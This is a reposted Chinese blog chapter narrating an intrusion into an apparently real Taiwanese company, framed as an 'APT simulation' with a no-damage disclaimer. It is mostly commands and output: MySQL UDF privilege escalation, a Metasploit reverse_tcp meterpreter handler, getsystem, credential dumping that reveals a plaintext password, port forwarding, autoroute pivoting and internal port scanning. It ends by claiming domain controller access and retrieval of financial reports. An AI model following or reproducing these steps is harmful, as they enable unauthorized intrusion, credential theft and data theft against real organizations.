【连载】第一章：亚洲-台湾（1）

最新推荐文章于 2023-04-17 09:45:43 发布

Claire_ljy

最新推荐文章于 2023-04-17 09:45:43 发布

阅读量2k

点赞数

文章标签： shell php 运维

原文链接：http://www.cnblogs.com/qiniuyhm/p/6358151.html

版权

此文转载自90sec.仅作好文推荐。从本文可以学到很多知识，比如渗透时的明确目标、msf使用、渗透思路等等。

声明：本博客所有渗透测试都以模拟任务为点，以实战出发来探讨APT攻击，来讲述网络安全在今后的重要性，所有实战攻击都点到为止，并未破坏，下载，删除，更改，任何个人，组织，公司内部文件。

作者的话：计划是从亚洲各个国家开始，每个国家挑选一个具有针对性的公司/组织，以模拟任务为由，以实战渗透为主探讨，每一章都以数日来完成，甚至数月。不保证文章定期更新时间。

（为保证文章中公司的隐私，部分可能有马赛克，也由于是APT文章，具有一定的跨越时间，部分无截图）

模拟任务：拿到该公司明年计划，拿到该公司今年报表，并且摸清该公司组织架构。盈利情况。

第一个shell为目标主站shell，为08 R2，提权后遂改变主意。由于是以APT为主，并不打算以主站权限为点渗透，动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。

主站为2008 R2

主站端口为

搜集端口为该公司的其他分站提供了有力的下一步。

进程搜集：红色为重点搜集源

D:\> tasklist

映像名稱 PID 工作階段名稱工作階段 # RAM使用量

========================= ======== ================ =========== ============

System Idle Process 0 0 24 K

System 4 0 372 K

smss.exe 296 0 1,448 K

csrss.exe 400 0 6,968 K

wininit.exe 452 0 5,636 K

csrss.exe 460 1 12,460 K

winlogon.exe 496 1 6,484 K

services.exe 556 0 10,392 K

lsass.exe 572 0 22,076 K

lsm.exe 584 0 7,104 K

svchost.exe 676 0 10,840 K

svchost.exe 760 0 9,492 K

LogonUI.exe 852 1 19,632 K

svchost.exe 864 0 21,188 K

svchost.exe 904 0 34,904 K

svchost.exe 944 0 13,476 K

svchost.exe 996 0 13,512 K

svchost.exe 168 0 19,480 K

svchost.exe 648 0 12,348 K

spoolsv.exe 1080 0 16,672 K

armsvc.exe 1124 0 4,208 K

apnmcp.exe 1172 0 5,832 K

svchost.exe 1196 0 9,228 K

aspnet_state.exe 1224 0 8,264 K

FileZilla Server.exe 1344 0 7,876 K

svchost.exe 1380 0 10,408 K

inetinfo.exe 1412 0 31,680 K

EngineServer.exe 1448 0 568 K

FrameworkService.exe 1548 0 19,580 K

VsTskMgr.exe 1612 0 1,724 K

MDM.EXE 1680 0 6,652 K

naPrdMgr.exe 1692 0 2,116 K

mfevtps.exe 1720 0 992 K

sqlservr.exe 1760 0 13,284 K

svchost.exe 1844 0 3,452 K

snmp.exe 1868 0 9,264 K

sqlwriter.exe 1904 0 7,440 K

vmtoolsd.exe 1976 0 17,012 K

snmp.exe 1988 0 3,164 K

conhost.exe 1996 0 4,784 K

vmware-converter-a.exe 2068 0 31,460 K

vmware-converter.exe 2180 0 38,176 K

vmware-converter.exe 2228 0 32,828 K

svchost.exe 2288 0 14,152 K

McShield.exe 2320 0 89,332 K

mfeann.exe 2468 0 5,860 K

conhost.exe 2476 0 3,380 K

w3wp.exe 2592 0 160,760 K

w3wp.exe 2812 0 463,872 K

svchost.exe 3452 0 9,656 K

svchost.exe 4104 0 6,384 K

dllhost.exe 4252 0 12,192 K

msdtc.exe 4424 0 8,708 K

svchost.exe 4196 0 34,760 K

w3wp.exe 5604 0 12,632 K

TrustedInstaller.exe 4500 0 11,788 K

cmd.exe 6292 0 3,932 K

conhost.exe 6384 0 4,476 K

tasklist.exe 1496 0 6,064 K

WmiPrvSE.exe 5508 0 7,272 K

账户搜集：（已处理）

重要路径搜集：

（无图，路径搜集为未来可能需要dump file做准备）

数据库密码搜集：

（无图，密码搜集为未来可能需要碰撞做准备）

杀毒软件搜集：

强力的麦咖啡

管理员习惯搜集：

（无图，尽量避免与admin的fvsf）（面对面的vs是不是这么拼写？）

其他搜集：

（由于是第一个shell，具体的已经忘记了）

第二台服务器权限：window x86 2003

根据上一台的服务器情报搜集很快得到了一台win03

IP .3

为一台开发机。目标仅支持asp，无其他脚本支持。但是服务器中安装有mysql，php等。并且无asp to mysql Device Drive IIS配置中也并不支持php。msf反弹后，继续搜集情报。

type C:\MySQL\MySQL Server 5.0\data\mysql\user.MYD

得到root hash

在实际情况中，交互的shell下运行mysql -uroot -pxxx无法继续交互，需要参数e解决这个问题。

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"

mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"

mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';"

mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"

mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

如果限制上传大小同样可以hex解决上传大小问题。

以下为部分msf操作实例

msf >use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >exploit -l

meterpreter >ps

Process List

============

PID PPID Name Arch Session User Path

--- ---- ---- ---- ------- ---- ----

0 0 [System Process]

4 0 System x86 0 NT AUTHORITY\SYSTEM

304 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

352 304 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

376 304 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

424 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

436 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

620 424 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe

636 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

708 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

768 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

812 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe

828 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1000 424 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

1028 424 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe

1160 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1228 424 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe

1252 424 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe

1304 424 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe

1348 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe

1408 424 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe

1472 424 mssearch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe

1720 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

2128 2084 explorer.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\Explorer.EXE

2208 2128 vmtoolsd.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe

2232 2128 ctfmon.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\ctfmon.exe

2244 2128 sqlmangr.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe

2396 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

2440 424 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe

3008 2128 cmd.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\cmd.exe

3024 3008 conime.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\conime.exe

3180 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe

3248 828 wuauclt.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\wuauclt.exe

3380 376 logon.scr x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\System32\logon.scr

meterpreter > migrate 2128

Migrating from 3104 to 2128...

Migration completed successfully.

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > msv

[+] Running as SYSTEM

Retrieving msv credentials

msv credentials

===============

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;109205 NTLM xxxxxxxxxxxx Administrator lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }

0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }

0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)

0;54469 NTLM n.s. (Credentials KO)

0;999 NTLM WORKGROUP xxxxxxxxxxxx$ n.s. (Credentials KO)

meterpreter > kerberos

[+] Running as SYSTEM

Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;996 Negotiate NT AUTHORITY NETWORK SERVICE

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;54469 NTLM

0;999 NTLM WORKGROUP xxxxxxxxxxxx$

0;109205 NTLM xxxxxxxxxxxx Administrator 123456

meterpreter > portfwd add -l 3389 -r x.x.x.x -p 3389 #IP已做处理

Local TCP relay created: :3389 <-> x.x.x.x:3389

meterpreter > portfwd

Active Port Forwards

====================

Index Local Remote Direction

----- ----- ------ ---------

1 0.0.0.0:3389 x.x.x.x:3389 Forward

1 total active port forwards.

root@xxxx:/# rdesktop 127.0.0.1:3389

Autoselected keyboard map en-us

Failed to negotiate protocol, retrying with plain RDP.

WARNING: Remote desktop does not support colour depth 24; falling back to 16

meterpreter > run autoroute -h

Usage: run autoroute [-r] -s subnet -n netmask

Examples:

run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0

run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0

run autoroute -s 10.10.10.1/24 # CIDR notation is also okay

run autoroute -p # Print active routing table

run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route

Use the "route" and "ipconfig" Meterpreter commands to learn about available routes

[-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module

meterpreter > ifconfig

Interface 1

============

Name : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU : 1520

IPv4 Address : 127.0.0.1

Interface 2

============

Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport

Hardware MAC : 00:11:25:40:77:8f

MTU : 1500

IPv4 Address : 10.23.255.3

IPv4 Netmask : 255.255.255.0

meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0

Adding a route to 10.23.255.3/255.255.255.0...

[+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227

Use the -p option to list all active routes

meterpreter > run autoroute -p

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

10.23.255.3 255.255.255.0 Session 3

meterpreter > ifconfig

Interface 1

============

Name : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU : 1520

IPv4 Address : 127.0.0.1

Interface 2

============

Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport

Hardware MAC : 00:11:25:40:77:8f

MTU : 1500

IPv4 Address : 10.23.255.3

IPv4 Netmask : 255.255.255.0

meterpreter >

Background session 3? [y/N]

msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

CONCURRENCY 10 yes The number of concurrent ports to check per host

DELAY 0 yes The delay between connections, per thread, in milliseconds

JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.

PORTS 445,80,3389,22 yes Ports to scan (e.g. 22-25,80,110-900)

RHOSTS 10.23.255.1-255 yes The target address range or CIDR identifier

THREADS 10 yes The number of concurrent threads

TIMEOUT 1000 yes The socket connect

timeout in milliseconds

最终得到了域控权限，并且得到了跨段的服务器权限。得到了个人机的重要权限，以及公司财报doc。

部分截图如下：由于时间问题，顺序可能打乱了。

forum.php?mod=attachment&aid=MjI3MjJ8ZjdjZjExZjZ8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

forum.php?mod=attachment&aid=MjI3MjN8YzZkOGQ3OWN8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

forum.php?mod=attachment&aid=MjI3MjR8ZjZmM2UyZDd8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

forum.php?mod=attachment&aid=MjI3MjV8ZjcxYmRjNTl8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

跳段，到个人机

forum.php?mod=attachment&aid=MjI3MjZ8MzcwZWRhM2J8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

forum.php?mod=attachment&aid=MjI3Mjd8M2FlOTJhNTJ8MTQ4NTc2MzQ1MHwzMTQyfDEwMjM3&noupdate=yes

放弃权限，所有操作并未更改，下载，删除等一切损害该公司的行为。点到为止。

具有时间周期的渗透，最糟糕的就是回忆截图，实战中，很多需要抢时间的地方，很难想起截图或者做笔记，下次争取录屏，来回忆。

查看原文： http://www.am0s.com/jchw/170.html

转载于:https://www.cnblogs.com/qiniuyhm/p/6358151.html

Claire_ljy

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫